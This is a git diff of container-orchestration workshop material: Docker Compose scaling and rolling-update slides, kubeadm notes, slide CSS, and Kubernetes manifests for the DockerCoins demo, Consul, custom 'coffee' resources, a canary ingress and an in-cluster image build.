- The speed is computed by the browser, checking the counter about once per second
|
||||
|
||||
- Between two consecutive updates, the counter will increase either by 4, or by 0
|
||||
|
||||
- The perceived speed will therefore be 4 - 4 - 4 - 0 - 4 - 4 - etc.
|
||||
|
||||
*We told you to not ask!!!*
|
||||
|
||||
---
|
||||
|
||||
## Scaling up the application
|
||||
|
||||
- Our goal is to make that performance graph go up (without changing a line of code!)
|
||||
|
||||
--
|
||||
|
||||
- Before trying to scale the application, we'll figure out if we need more resources
|
||||
|
||||
(CPU, RAM...)
|
||||
|
||||
- For that, we will use good old UNIX tools on our Docker node
|
||||
|
||||
---
|
||||
|
||||
## Looking at resource usage
|
||||
|
||||
- Let's look at CPU, memory, and I/O usage
|
||||
|
||||
.exercise[
|
||||
|
||||
- run `top` to see CPU and memory usage (you should see idle cycles)
|
||||
|
||||
- run `vmstat 3` to see I/O usage (si/so/bi/bo)
|
||||
<br/>(the 4 numbers should be almost zero, except `bo` for logging)
|
||||
|
||||
]
|
||||
|
||||
We have available resources.
|
||||
|
||||
- Why?
|
||||
- How can we use them?
|
||||
|
||||
---
|
||||
|
||||
## Scaling workers on a single node
|
||||
|
||||
- Docker Compose supports scaling
|
||||
- Let's scale `worker` and see what happens!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Start one more `worker` container:
|
||||
```bash
|
||||
docker-compose scale worker=2
|
||||
```
|
||||
|
||||
- Look at the performance graph (it should show a x2 improvement)
|
||||
|
||||
- Look at the aggregated logs of our containers (`worker_2` should show up)
|
||||
|
||||
- Look at the impact on CPU load with e.g. top (it should be negligible)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adding more workers
|
||||
|
||||
- Great, let's add more workers and call it a day, then!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Start eight more `worker` containers:
|
||||
```bash
|
||||
docker-compose scale worker=10
|
||||
```
|
||||
|
||||
- Look at the performance graph: does it show a x10 improvement?
|
||||
|
||||
- Look at the aggregated logs of our containers
|
||||
|
||||
- Look at the impact on CPU load and memory usage
|
||||
|
||||
<!--
|
||||
```bash
|
||||
sleep 5
|
||||
killall docker-compose
|
||||
```
|
||||
-->
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
# Identifying bottlenecks
|
||||
|
||||
- You should have seen a 3x speed bump (not 10x)
|
||||
|
||||
- Adding workers didn't result in linear improvement
|
||||
|
||||
- *Something else* is slowing us down
|
||||
|
||||
--
|
||||
|
||||
- ... But what?
|
||||
|
||||
--
|
||||
|
||||
- The code doesn't have instrumentation
|
||||
|
||||
- Let's use state-of-the-art HTTP performance analysis!
|
||||
<br/>(i.e. good old tools like `ab`, `httping`...)
|
||||
|
||||
---
|
||||
|
||||
## Accessing internal services
|
||||
|
||||
- `rng` and `hasher` are exposed on ports 8001 and 8002
|
||||
|
||||
- This is declared in the Compose file:
|
||||
|
||||
```yaml
|
||||
...
|
||||
rng:
|
||||
build: rng
|
||||
ports:
|
||||
- "8001:80"
|
||||
|
||||
hasher:
|
||||
build: hasher
|
||||
ports:
|
||||
- "8002:80"
|
||||
...
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Measuring latency under load
|
||||
|
||||
We will use `httping`.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the latency of `rng`:
|
||||
```bash
|
||||
httping -c 10 localhost:8001
|
||||
```
|
||||
|
||||
- Check the latency of `hasher`:
|
||||
```bash
|
||||
httping -c 10 localhost:8002
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
`rng` has a much higher latency than `hasher`.
|
||||
|
||||
---
|
||||
|
||||
## Let's draw hasty conclusions
|
||||
|
||||
- The bottleneck seems to be `rng`
|
||||
|
||||
- *What if* we don't have enough entropy and can't generate enough random numbers?
|
||||
|
||||
- We need to scale out the `rng` service on multiple machines!
|
||||
|
||||
Note: this is a fiction! We have enough entropy. But we need a pretext to scale out.
|
||||
|
||||
(In fact, the code of `rng` uses `/dev/urandom`, which never runs out of entropy...
|
||||
<br/>
|
||||
...and is [just as good as `/dev/random`](http://www.slideshare.net/PacSecJP/filippo-plain-simple-reality-of-entropy).)
|
||||
|
||||
---
|
||||
|
||||
## Clean up
|
||||
|
||||
- Before moving on, let's remove those containers
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Compose to remove everything:
|
||||
```bash
|
||||
docker-compose down
|
||||
```
|
||||
|
||||
]
|
||||
@@ -1,62 +0,0 @@
|
||||
exclude:
|
||||
- in-person
|
||||
|
||||
chat: FIXME
|
||||
|
||||
chapters:
|
||||
- |
|
||||
class: title
|
||||
Docker <br/> Orchestration <br/> Workshop
|
||||
- intro.md
|
||||
- |
|
||||
@@TOC@@
|
||||
- - prereqs.md
|
||||
- versions.md
|
||||
- |
|
||||
class: title
|
||||
|
||||
All right!
|
||||
<br/>
|
||||
We're all set.
|
||||
<br/>
|
||||
Let's do this.
|
||||
- |
|
||||
name: part-1
|
||||
|
||||
class: title, self-paced
|
||||
|
||||
Part 1
|
||||
- sampleapp.md
|
||||
- |
|
||||
class: title
|
||||
|
||||
Scaling out
|
||||
- swarmkit.md
|
||||
- creatingswarm.md
|
||||
- machine.md
|
||||
- morenodes.md
|
||||
- - firstservice.md
|
||||
- ourapponswarm.md
|
||||
- - operatingswarm.md
|
||||
- netshoot.md
|
||||
- swarmnbt.md
|
||||
- ipsec.md
|
||||
- updatingservices.md
|
||||
- healthchecks.md
|
||||
- nodeinfo.md
|
||||
- swarmtools.md
|
||||
- - security.md
|
||||
- secrets.md
|
||||
- leastprivilege.md
|
||||
- namespaces.md
|
||||
- apiscope.md
|
||||
- encryptionatrest.md
|
||||
- logging.md
|
||||
- metrics.md
|
||||
- stateful.md
|
||||
- extratips.md
|
||||
- end.md
|
||||
- |
|
||||
class: title
|
||||
|
||||
Thank you!
|
||||
@@ -1,68 +0,0 @@
|
||||
# Setting up Kubernetes
|
||||
|
||||
- How did we setup these Kubernetes clusters that we're using?
|
||||
|
||||
--
|
||||
|
||||
- We used `kubeadm` on "fresh" EC2 instances with Ubuntu 16.04 LTS
|
||||
|
||||
1. Install Docker
|
||||
|
||||
2. Install Kubernetes packages
|
||||
|
||||
3. Run `kubeadm init` on the master node
|
||||
|
||||
4. Setup Weave (the overlay network)
|
||||
<br/>
|
||||
(that step is just one `kubectl apply` command; discussed later)
|
||||
|
||||
5. Run `kubeadm join` on the other nodes (with the token produced by `kubeadm init`)
|
||||
|
||||
6. Copy the configuration file generated by `kubeadm init`
|
||||
|
||||
---
|
||||
|
||||
## `kubeadm` drawbacks
|
||||
|
||||
- Doesn't setup Docker or any other container engine
|
||||
|
||||
- Doesn't setup the overlay network
|
||||
|
||||
- Scripting is complex
|
||||
<br/>
|
||||
(because extracting the token requires advanced `kubectl` commands)
|
||||
|
||||
- Doesn't setup multi-master (no high availability)
|
||||
|
||||
--
|
||||
|
||||
- It's still twice as much steps as setting up a Swarm cluster 😕
|
||||
|
||||
---
|
||||
|
||||
## Other deployment options
|
||||
|
||||
- If you are on Google Cloud:
|
||||
[GKE](https://cloud.google.com/container-engine/)
|
||||
|
||||
Empirically the best Kubernetes deployment out there
|
||||
|
||||
- If you are on AWS:
|
||||
[kops](https://github.com/kubernetes/kops)
|
||||
|
||||
... But with AWS re:invent just around the corner, expect some changes
|
||||
|
||||
- On a local machine:
|
||||
[minikube](https://kubernetes.io/docs/getting-started-guides/minikube/),
|
||||
[kubespawn](https://github.com/kinvolk/kube-spawn)
|
||||
|
||||
FIXME
|
||||
|
||||
- If you want something customizable:
|
||||
[kubicorn](https://github.com/kris-nova/kubicorn)
|
||||
|
||||
Probably the closest to a multi-cloud/hybrid solution so far, but in development
|
||||
|
||||
- Also, many commercial options!
|
||||
|
||||
FIXME
|
||||
@@ -1,226 +0,0 @@
|
||||
# Updating services
|
||||
|
||||
- We want to make changes to the web UI
|
||||
|
||||
- The process is as follows:
|
||||
|
||||
- edit code
|
||||
|
||||
- build new image
|
||||
|
||||
- ship new image
|
||||
|
||||
- run new image
|
||||
|
||||
---
|
||||
|
||||
## Updating a single service the hard way
|
||||
|
||||
- To update a single service, we could do the following:
|
||||
```bash
|
||||
REGISTRY=localhost:5000 TAG=v0.3
|
||||
IMAGE=$REGISTRY/dockercoins_webui:$TAG
|
||||
docker build -t $IMAGE webui/
|
||||
docker push $IMAGE
|
||||
docker service update dockercoins_webui --image $IMAGE
|
||||
```
|
||||
|
||||
- Make sure to tag properly your images: update the `TAG` at each iteration
|
||||
|
||||
(When you check which images are running, you want these tags to be uniquely identifiable)
|
||||
|
||||
---
|
||||
|
||||
## Updating services the easy way
|
||||
|
||||
- With the Compose integration, all we have to do is:
|
||||
```bash
|
||||
export TAG=v0.3
|
||||
docker-compose -f composefile.yml build
|
||||
docker-compose -f composefile.yml push
|
||||
docker stack deploy -c composefile.yml nameofstack
|
||||
```
|
||||
|
||||
--
|
||||
|
||||
- That's exactly what we used earlier to deploy the app
|
||||
|
||||
- We don't need to learn new commands!
|
||||
|
||||
---
|
||||
|
||||
## Updating the web UI
|
||||
|
||||
- Let's make the numbers on the Y axis bigger!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the file `webui/files/index.html`
|
||||
|
||||
- Locate the `font-size` CSS attribute and increase it (at least double it)
|
||||
|
||||
- Save and exit
|
||||
|
||||
- Build, ship, and run:
|
||||
```bash
|
||||
export TAG=v0.3
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
docker stack deploy -c dockercoins.yml dockercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Viewing our changes
|
||||
|
||||
- Wait at least 10 seconds (for the new version to be deployed)
|
||||
|
||||
- Then reload the web UI
|
||||
|
||||
- Or just mash "reload" frantically
|
||||
|
||||
- ... Eventually the legend on the left will be bigger!
|
||||
|
||||
---
|
||||
|
||||
## Rolling updates
|
||||
|
||||
- Let's change a scaled service: `worker`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit `worker/worker.py`
|
||||
|
||||
- Locate the `sleep` instruction and change the delay
|
||||
|
||||
- Build, ship, and run our changes:
|
||||
```bash
|
||||
export TAG=v0.4
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
docker stack deploy -c dockercoins.yml dockercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Viewing our update as it rolls out
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the status of the `dockercoins_worker` service:
|
||||
```bash
|
||||
watch docker service ps dockercoins_worker
|
||||
```
|
||||
|
||||
- Hide the tasks that are shutdown:
|
||||
```bash
|
||||
watch -n1 "docker service ps dockercoins_worker | grep -v Shutdown.*Shutdown"
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
If you had stopped the workers earlier, this will automatically restart them.
|
||||
|
||||
By default, SwarmKit does a rolling upgrade, one instance at a time.
|
||||
|
||||
We should therefore see the workers being updated one my one.
|
||||
|
||||
---
|
||||
|
||||
## Changing the upgrade policy
|
||||
|
||||
- We can set upgrade parallelism (how many instances to update at the same time)
|
||||
|
||||
- And upgrade delay (how long to wait between two batches of instances)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Change the parallelism to 2 and the delay to 5 seconds:
|
||||
```bash
|
||||
docker service update dockercoins_worker \
|
||||
--update-parallelism 2 --update-delay 5s
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The current upgrade will continue at a faster pace.
|
||||
|
||||
---
|
||||
|
||||
## Changing the policy in the Compose file
|
||||
|
||||
- The policy can also be updated in the Compose file
|
||||
|
||||
- This is done by adding an `update_config` key under the `deploy` key:
|
||||
|
||||
```yaml
|
||||
deploy:
|
||||
replicas: 10
|
||||
update_config:
|
||||
parallelism: 2
|
||||
delay: 10s
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Rolling back
|
||||
|
||||
- At any time (e.g. before the upgrade is complete), we can rollback:
|
||||
|
||||
- by editing the Compose file and redeploying;
|
||||
|
||||
- or with the special `--rollback` flag
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to rollback the service:
|
||||
```bash
|
||||
docker service update dockercoins_worker --rollback
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
What happens with the web UI graph?
|
||||
|
||||
---
|
||||
|
||||
## The fine print with rollback
|
||||
|
||||
- Rollback reverts to the previous service definition
|
||||
|
||||
- If we visualize successive updates as a stack:
|
||||
|
||||
- it doesn't "pop" the latest update
|
||||
|
||||
- it "pushes" a copy of the previous update on top
|
||||
|
||||
- ergo, rolling back twice does nothing
|
||||
|
||||
- "Service definition" includes rollout cadence
|
||||
|
||||
- Each `docker service update` command = a new service definition
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Timeline of an upgrade
|
||||
|
||||
- SwarmKit will upgrade N instances at a time
|
||||
<br/>(following the `update-parallelism` parameter)
|
||||
|
||||
- New tasks are created, and their desired state is set to `Ready`
|
||||
<br/>.small[(this pulls the image if necessary, ensures resource availability, creates the container ... without starting it)]
|
||||
|
||||
- If the new tasks fail to get to `Ready` state, go back to the previous step
|
||||
<br/>.small[(SwarmKit will try again and again, until the situation is addressed or desired state is updated)]
|
||||
|
||||
- When the new tasks are `Ready`, it sets the old tasks desired state to `Shutdown`
|
||||
|
||||
- When the old tasks are `Shutdown`, it starts the new tasks
|
||||
|
||||
- Then it waits for the `update-delay`, and continues with the next batch of instances
|
||||
@@ -1,41 +0,0 @@
|
||||
## Brand new versions!
|
||||
|
||||
- Kubernetes 1.8
|
||||
- Docker Engine 17.10
|
||||
- Docker Compose 1.16
|
||||
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check all installed versions:
|
||||
```bash
|
||||
kubectl version
|
||||
docker version
|
||||
docker-compose -v
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Kubernetes and Docker compatibility
|
||||
|
||||
- Kubernetes only validates Docker Engine versions 1.11.2, 1.12.6, 1.13.1, and 17.03.2
|
||||
|
||||
--
|
||||
|
||||
class: extra-details
|
||||
|
||||
- Are we living dangerously?
|
||||
|
||||
--
|
||||
|
||||
class: extra-details
|
||||
|
||||
- "Validates" = continuous integration builds
|
||||
|
||||
- The Docker API is versioned, and offers strong backward-compatibility
|
||||
|
||||
(If a client uses e.g. API v1.25, the Docker Engine will keep behaving the same way)
|
||||
@@ -1,17 +0,0 @@
|
||||
## What's next?
|
||||
|
||||
- Stateful services (databases and the like)
|
||||
|
||||
volumes, persistent volume claims, stateful sets
|
||||
|
||||
- Layer 7 constructs (HTTP routing)
|
||||
|
||||
ingress (check traefik!)
|
||||
|
||||
- Logging, metrics
|
||||
|
||||
- Secrets, config maps
|
||||
|
||||
- Developer experience
|
||||
|
||||
- Dashboard
|
||||
@@ -1,140 +0,0 @@
|
||||
@import url(https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz);
|
||||
@import url(https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic);
|
||||
@import url(https://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700,400italic);
|
||||
|
||||
/* For print! Borrowed from https://github.com/gnab/remark/issues/50 */
|
||||
@page {
|
||||
size: 1210px 681px;
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
@media print {
|
||||
.remark-slide-scaler {
|
||||
width: 100% !important;
|
||||
height: 100% !important;
|
||||
transform: scale(1) !important;
|
||||
top: 0 !important;
|
||||
left: 0 !important;
|
||||
}
|
||||
}
|
||||
|
||||
/* put slide numbers in top-right corner instead of bottom-right */
|
||||
div.remark-slide-number {
|
||||
top: 6px;
|
||||
left: unset;
|
||||
bottom: unset;
|
||||
right: 6px;
|
||||
}
|
||||
|
||||
body { font-family: 'Droid Serif'; }
|
||||
|
||||
h1, h2, h3 {
|
||||
font-family: 'Yanone Kaffeesatz';
|
||||
font-weight: normal;
|
||||
margin-top: 0.5em;
|
||||
}
|
||||
|
||||
a {
|
||||
text-decoration: none;
|
||||
color: blue;
|
||||
}
|
||||
|
||||
.remark-slide-content { padding: 1em 2.5em 1em 2.5em; }
|
||||
.remark-slide-content { font-size: 25px; }
|
||||
.remark-slide-content h1 { font-size: 50px; }
|
||||
.remark-slide-content h2 { font-size: 50px; }
|
||||
.remark-slide-content h3 { font-size: 25px; }
|
||||
|
||||
.footnote {
|
||||
position: absolute;
|
||||
bottom: 3em;
|
||||
}
|
||||
|
||||
.remark-code { font-size: 25px; }
|
||||
.small .remark-code { font-size: 16px; }
|
||||
.remark-code, .remark-inline-code { font-family: 'Ubuntu Mono'; }
|
||||
.remark-inline-code {
|
||||
background-color: #ccc;
|
||||
}
|
||||
|
||||
.red { color: #fa0000; }
|
||||
.gray { color: #ccc; }
|
||||
.small { font-size: 70%; }
|
||||
.big { font-size: 140%; }
|
||||
.underline { text-decoration: underline; }
|
||||
.strike { text-decoration: line-through; }
|
||||
|
||||
.pic {
|
||||
vertical-align: middle;
|
||||
text-align: center;
|
||||
padding: 0 0 0 0 !important;
|
||||
}
|
||||
img {
|
||||
max-width: 100%;
|
||||
max-height: 550px;
|
||||
}
|
||||
.title {
|
||||
vertical-align: middle;
|
||||
text-align: center;
|
||||
}
|
||||
.title h1 { font-size: 5em; }
|
||||
.title p { font-size: 3em; }
|
||||
|
||||
.quote {
|
||||
background: #eee;
|
||||
border-left: 10px solid #ccc;
|
||||
margin: 1.5em 10px;
|
||||
padding: 0.5em 10px;
|
||||
quotes: "\201C""\201D""\2018""\2019";
|
||||
font-style: italic;
|
||||
}
|
||||
.quote:before {
|
||||
color: #ccc;
|
||||
content: open-quote;
|
||||
font-size: 4em;
|
||||
line-height: 0.1em;
|
||||
margin-right: 0.25em;
|
||||
vertical-align: -0.4em;
|
||||
}
|
||||
.quote p {
|
||||
display: inline;
|
||||
}
|
||||
|
||||
.blackbelt {
|
||||
background-image: url("blackbelt.png");
|
||||
background-size: 1.5em;
|
||||
background-repeat: no-repeat;
|
||||
padding-left: 2em;
|
||||
}
|
||||
.warning {
|
||||
background-image: url("warning.png");
|
||||
background-size: 1.5em;
|
||||
background-repeat: no-repeat;
|
||||
padding-left: 2em;
|
||||
}
|
||||
.exercise {
|
||||
background-color: #eee;
|
||||
background-image: url("keyboard.png");
|
||||
background-size: 1.4em;
|
||||
background-repeat: no-repeat;
|
||||
background-position: 0.2em 0.2em;
|
||||
border: 2px dotted black;
|
||||
}
|
||||
.exercise:before {
|
||||
content: "Exercise";
|
||||
margin-left: 1.8em;
|
||||
}
|
||||
|
||||
li p { line-height: 1.25em; }
|
||||
|
||||
div.extra-details {
|
||||
background-image: url(extra-details.png);
|
||||
background-position: 0.5% 1%;
|
||||
background-size: 4%;
|
||||
}
|
||||
|
||||
/* This is used only for the history slide (the only table in this doc) */
|
||||
td {
|
||||
padding: 0.1em 0.5em;
|
||||
background: #eee;
|
||||
}
|
||||
@@ -2,14 +2,14 @@ version: "2"
|
||||
|
||||
services:
|
||||
elasticsearch:
|
||||
image: elasticsearch
|
||||
image: elasticsearch:2
|
||||
# If you need to access ES directly, just uncomment those lines.
|
||||
#ports:
|
||||
# - "9200:9200"
|
||||
# - "9300:9300"
|
||||
|
||||
logstash:
|
||||
image: logstash
|
||||
image: logstash:2
|
||||
command: |
|
||||
-e '
|
||||
input {
|
||||
@@ -47,7 +47,7 @@ services:
|
||||
- "12201:12201/udp"
|
||||
|
||||
kibana:
|
||||
image: kibana
|
||||
image: kibana:4
|
||||
ports:
|
||||
- "5601:5601"
|
||||
environment:
|
||||
|
||||
21
k8s/canary.yaml
Normal file
21
k8s/canary.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
annotations:
|
||||
traefik.ingress.kubernetes.io/service-weights: |
|
||||
whatever: 90%
|
||||
whatever-new: 10%
|
||||
spec:
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 80
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever-new
|
||||
servicePort: 80
|
||||
15
k8s/coffee-1.yaml
Normal file
15
k8s/coffee-1.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
apiVersion: apiextensions.k8s.io/v1beta1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
version: v1alpha1
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
|
||||
35
k8s/coffee-2.yaml
Normal file
35
k8s/coffee-2.yaml
Normal file
@@ -0,0 +1,35 @@
|
||||
apiVersion: apiextensions.k8s.io/v1
|
||||
kind: CustomResourceDefinition
|
||||
metadata:
|
||||
name: coffees.container.training
|
||||
spec:
|
||||
group: container.training
|
||||
scope: Namespaced
|
||||
names:
|
||||
plural: coffees
|
||||
singular: coffee
|
||||
kind: Coffee
|
||||
shortNames:
|
||||
- cof
|
||||
versions:
|
||||
- name: v1alpha1
|
||||
served: true
|
||||
storage: true
|
||||
schema:
|
||||
openAPIV3Schema:
|
||||
properties:
|
||||
spec:
|
||||
required:
|
||||
- taste
|
||||
properties:
|
||||
taste:
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
type: string
|
||||
additionalPrinterColumns:
|
||||
- jsonPath: .spec.taste
|
||||
description: Subjective taste of that kind of coffee bean
|
||||
name: Taste
|
||||
type: string
|
||||
- jsonPath: .metadata.creationTimestamp
|
||||
name: Age
|
||||
type: date
|
||||
29
k8s/coffees.yaml
Normal file
29
k8s/coffees.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: arabica
|
||||
spec:
|
||||
taste: strong
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: robusta
|
||||
spec:
|
||||
taste: stronger
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: liberica
|
||||
spec:
|
||||
taste: smoky
|
||||
---
|
||||
kind: Coffee
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: excelsa
|
||||
spec:
|
||||
taste: fruity
|
||||
|
||||
86
k8s/consul.yaml
Normal file
86
k8s/consul.yaml
Normal file
@@ -0,0 +1,86 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.6"
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
28
k8s/docker-build.yaml
Normal file
28
k8s/docker-build.yaml
Normal file
@@ -0,0 +1,28 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: build-image
|
||||
spec:
|
||||
restartPolicy: OnFailure
|
||||
containers:
|
||||
- name: docker-build
|
||||
image: docker
|
||||
env:
|
||||
- name: REGISTRY_PORT
|
||||
value: #"30000"
|
||||
command: ["sh", "-c"]
|
||||
args:
|
||||
- |
|
||||
apk add --no-cache git &&
|
||||
mkdir /workspace &&
|
||||
git clone https://github.com/jpetazzo/container.training /workspace &&
|
||||
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
|
||||
docker push localhost:$REGISTRY_PORT/worker
|
||||
volumeMounts:
|
||||
- name: docker-socket
|
||||
mountPath: /var/run/docker.sock
|
||||
volumes:
|
||||
- name: docker-socket
|
||||
hostPath:
|
||||
path: /var/run/docker.sock
|
||||
|
||||
160
k8s/dockercoins.yaml
Normal file
160
k8s/dockercoins.yaml
Normal file
@@ -0,0 +1,160 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hasher
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/hasher:v0.1
|
||||
name: hasher
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: hasher
|
||||
name: hasher
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: hasher
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: redis
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
spec:
|
||||
containers:
|
||||
- image: redis
|
||||
name: redis
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: redis
|
||||
name: redis
|
||||
spec:
|
||||
ports:
|
||||
- port: 6379
|
||||
protocol: TCP
|
||||
targetPort: 6379
|
||||
selector:
|
||||
app: redis
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: rng
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/rng:v0.1
|
||||
name: rng
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: rng
|
||||
name: rng
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: rng
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/webui:v0.1
|
||||
name: webui
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: webui
|
||||
name: webui
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: webui
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
name: worker
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: worker
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: worker
|
||||
spec:
|
||||
containers:
|
||||
- image: dockercoins/worker:v0.1
|
||||
name: worker
|
||||
69
k8s/eck-cerebro.yaml
Normal file
69
k8s/eck-cerebro.yaml
Normal file
@@ -0,0 +1,69 @@
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: cerebro
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
spec:
|
||||
volumes:
|
||||
- name: conf
|
||||
configMap:
|
